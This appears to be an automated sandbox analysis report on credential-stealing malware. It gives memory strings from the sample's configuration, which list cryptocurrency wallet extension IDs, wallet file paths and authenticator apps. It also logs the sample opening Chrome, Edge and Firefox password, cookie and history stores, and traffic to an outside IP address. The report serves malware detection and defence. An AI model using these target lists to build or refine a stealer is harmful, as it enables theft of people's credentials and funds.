Source: random.exe, 00000000.00000003.1785770096.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fpC8
Source: random.exe, 00000000.00000003.1785770096.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage*
Source: random.exe, 00000000.00000003.1771608708.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: random.exe, 00000000.00000003.1785770096.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.B"
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49845 -> 94.156.102.240:80

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
